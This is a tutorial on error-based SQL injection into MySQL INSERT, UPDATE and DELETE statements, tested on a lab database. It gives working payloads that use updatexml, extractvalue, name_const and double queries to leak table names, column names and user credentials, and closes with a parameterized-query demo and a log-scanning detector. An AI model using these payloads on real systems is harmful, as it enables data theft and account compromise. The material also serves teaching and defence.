SQL Injection with Insert/update/delete

Source: Internet
Author: User
Tags: xpath

Preface: SQL injection through INSERT, UPDATE and DELETE statements is slightly different from injection into SELECT queries.

Reference: http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

0x1 Prerequisites

A. A MySQL database

B. Create a database and a table for the experiment

CREATE DATABASE newdb;
USE newdb;
CREATE TABLE users (
  id INT(3) NOT NULL AUTO_INCREMENT,
  username VARCHAR(32) NOT NULL,   -- column length assumed; not recoverable from the page
  password VARCHAR(32) NOT NULL,   -- column length assumed; not recoverable from the page
  PRIMARY KEY (id)
);

C. Add some data: INSERT INTO users (id, username, password) VALUES (1, 'r00tgrok', 'ohmygod_is_r00tgrok');

0x2 Using the updatexml() function // XPath injection

1. Injection

A. Payload format: or updatexml(1,concat(0x7e,(version())),0) or

B. INSERT injection: INSERT INTO users (id, username, password) VALUES (2, 'pseudo_z' or updatexml(1,concat(0x7e,(version())),0) or '', 'security-eng');

C. UPDATE injection: UPDATE users SET password='security-eng' or updatexml(2,concat(0x7e,(version())),0) or '' WHERE id=2 AND username='pseudo_z';

D. DELETE injection: DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or '';
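As an added illustration (not from the original page or the referenced paper) of why the ' or <expr> or ' shape above is evaluated inside the INSERT, the following Python uses sqlite3 as a stand-in for MySQL and a harmless constant 1 as a stand-in for the error-raising updatexml() call, and places the string-concatenated statement beside the parameterized form that keeps the payload as plain data:

```python
import sqlite3

# Constructed, self-contained demonstration. SQLite stands in for MySQL (same
# quoting rules and OR semantics); the constant 1 stands in for updatexml(),
# so the effect shows up as a changed stored value instead of a thrown error.
SCHEMA = ("CREATE TABLE users (id INTEGER PRIMARY KEY, "
          "username TEXT NOT NULL, password TEXT NOT NULL)")


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def last_username(conn):
    return conn.execute(
        "SELECT username FROM users ORDER BY id DESC LIMIT 1").fetchone()[0]


def insert_vulnerable(conn, username, password):
    # String concatenation: the quote inside `username` closes the literal,
    # the OR expression is evaluated by the database engine, and the trailing
    # quote re-opens a literal so the statement still parses.
    sql = "INSERT INTO users (username, password) VALUES ('%s', '%s')" % (
        username, password)
    conn.execute(sql)
    return last_username(conn)


def insert_parameterized(conn, username, password):
    # Placeholders: the driver binds the value separately from the statement
    # text, so the quotes and the OR are stored as data, never parsed as SQL.
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 (username, password))
    return last_username(conn)


# Constructed input with the page's payload shape: ' or <expr> or '
PAYLOAD = "pseudo_z' or 1 or '"

if __name__ == "__main__":
    # The vulnerable path stores the result of the OR expression ("1"),
    # the parameterized path stores the payload verbatim as the username.
    print(insert_vulnerable(fresh_db(), PAYLOAD, "security-eng"))
    print(insert_parameterized(fresh_db(), PAYLOAD, "security-eng"))
```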

2. Extracting data

A. Payload format:

or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)),0) or

B. INSERT, fetching a table name:

INSERT INTO users (id, username, password) VALUES (2, 'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)),0) or '', 'ohmygod_is_r00tgrok');

C. INSERT, fetching a column name:

INSERT INTO users (id, username, password) VALUES (2, 'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 0,1)),0) or '', 'ohmygod_is_r00tgrok');

D. INSERT to dump a row:

INSERT INTO users (id, username, password) VALUES (2, 'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id,username,password) FROM users LIMIT 0,1)),0) or '', 'ohmygod_is_r00tgrok');

E. DELETE to dump a row:

DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id,username,password) FROM users LIMIT 0,1)),0) or '';

F. UPDATE to dump?

The same table cannot be dumped through UPDATE, but a different table can:

UPDATE students SET name='nicky' or updatexml(1,concat(0x7e,(SELECT concat_ws(':',id,username,password) FROM newdb.users LIMIT 0,1)),0) or '' WHERE id=1;

3. Tips

A. The statement raises an error, and the error message carries the data being extracted.

B. Running the code from the author's paper against MySQL 5.6.19, the extraction steps above succeed, but the dump steps fail with: [ERR] 1093 - You can't specify target table 'users' for update in FROM clause

C. A search turned up two references for this error:

CASE 1:

Error code: DELETE FROM table_name WHERE column_name IN (SELECT column_name FROM table_name WHERE column_name > 10);

Fix code: DELETE FROM table_name WHERE column_name IN (SELECT * FROM (SELECT column_name FROM table_name WHERE column_name > 10) AS x);

Note: you cannot delete rows from the same table that the subquery reads from; the same applies to UPDATE.

CASE 2:

CREATE TABLE comments (id INT PRIMARY KEY, phrase TEXT, uid INT);
INSERT INTO comments VALUES (1, 'Admin user comments', 1), (2, 'HR user comments', 2), (3, 'RH user comments', 2);

Error code:

UPDATE comments

Fix code:

UPDATE comments SET phrase = (SELECT phrase FROM (SELECT * FROM comments) AS c1 WHERE c1.uid=2 AND c1.id=2) WHERE id = 3;

Description: MySQL does not allow an UPDATE or DELETE to read, through a subquery, the same table it is modifying. A subquery in a FROM clause is treated as a derived table: MySQL materializes it into a temporary table before the outer statement runs, so wrapping the inner subquery in a FROM-clause subquery makes the outer statement read that temporary table instead of referencing the target table directly.

4. updatexml() [returns the replaced XML fragment] and extractvalue() [extracts a value from an XML string using XPath notation] are both XML functions in MySQL, e.g.:

SET @xml = '<a><b>X</b><b>Y</b></a>';

SET @i = 1, @j = 2; SELECT @i, ExtractValue(@xml, '//b[$@i]');

// ExtractValue(xml_frag, xpath_expr)   // UpdateXML(xml_target, xpath_expr, new_xml)

MySQL's XPath support has a number of limitations, such as no support for node-set comparisons or for functions such as string(); XPath injection is similar to SQL injection, with slightly different syntax.

0x3 Using the extractvalue() function

A. Payload format: or extractvalue(1,concat(0x7e,database())) or

B. Injection:

INSERT INTO users (id, username, password) VALUES (2, 'r00tgrok' or extractvalue(1,concat(0x7e,database())) or '', 'pseudo_z');

UPDATE users SET password='nicky' or extractvalue(1,concat(0x7e,database())) or '' WHERE id=2 AND username='pseudo_z';

DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or '';

C. Extracting data:

INSERT INTO users (id, username, password) VALUES (2, 'r00tgrok' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1))) or '', 'balabala');

Dumping, and the UPDATE and DELETE forms, work the same way as with updatexml().

0x4 Using name_const() // introduced in 5.0.13; returns any given value

A. Payload format: or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or

B. Injection:

UPDATE users SET password='nicky' or (SELECT * FROM (SELECT name_const(version(),1), name_const(version(),1)) a) or '' WHERE id=2 AND username='pseudo_z';

C. Extracting data:

INSERT INTO users (id, username, password) VALUES (1, 'admin' or (SELECT * FROM (SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1), name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1)) a) or '', 'oyyoug0d');

0x5 Double-query injection // MySQL will not run two statements here, so a subquery is used

1. Injection

INSERT INTO users (id, username, password) VALUES (1, 'r00tgrok' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(database() AS char),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'bl4ckhat');

DELETE FROM users WHERE id=1 or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(database() AS char),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '';

2. Extracting data

INSERT INTO users (id, username, password) VALUES (1, 'pseudo_z' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x7e,0x27,cast(users.username AS char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.columns GROUP BY x) a) or '', 'jesus-2014');

0x6 Other variants

' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
' * (payload) * '
' or (payload) and '
"– (payload) –"
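Detection-side example, added here and not part of the original page: the indicators below cover the error-based functions used in sections 0x2 to 0x5 (updatexml, extractvalue, name_const, the count/floor(rand()) double query and information_schema probing) and are run over constructed lines shaped like a MySQL general query log, flagging only INSERT/UPDATE/DELETE statements that trip one of them:

```python
import re

# Constructed sample lines in the shape of a MySQL general query log (not real logs).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z  12 Query  INSERT INTO users (id, username, password) VALUES (2, 'pseudo_z', 'security-eng')
2024-05-01T10:00:02Z  12 Query  INSERT INTO users (id, username, password) VALUES (2, 'pseudo_z' or updatexml(1,concat(0x7e,(version())),0) or '', 'security-eng')
2024-05-01T10:00:03Z  13 Query  UPDATE users SET password='nicky' or extractvalue(1,concat(0x7e,database())) or '' WHERE id=2
2024-05-01T10:00:04Z  14 Query  DELETE FROM users WHERE id=1 or (select 1 from (select count(*), concat((select database()), floor(rand(0)*2)) x from information_schema.columns group by x) a) or ''
2024-05-01T10:00:05Z  15 Query  SELECT id FROM users WHERE username='alice'
"""

# One indicator per error-based technique described on the page.
INDICATORS = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    # count(*) grouped on a floor(rand(0)*2) key: the duplicate-key double query
    "double_query": re.compile(r"\bcount\s*\(\s*\*\s*\).*\bfloor\s*\(\s*rand\s*\(", re.I),
    "schema_probe": re.compile(r"\binformation_schema\s*\.", re.I),
}
WRITE_STMT = re.compile(r"\b(INSERT|UPDATE|DELETE)\b", re.I)


def classify(line):
    """Return the indicator names found in one log line ([] for a clean line)."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def scan_log(text):
    """Return (line_no, statement_type, indicators) for each write statement
    that trips at least one indicator; plain reads and clean writes are skipped."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        kind = WRITE_STMT.search(line)
        found = classify(line)
        if kind and found:
            hits.append((no, kind.group(1).upper(), found))
    return hits


if __name__ == "__main__":
    for no, kind, found in scan_log(SAMPLE_LOG):
        print(f"line {no}: {kind} statement flagged by {', '.join(found)}")
```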

See also: http://websec.ca/kb/sql_injection
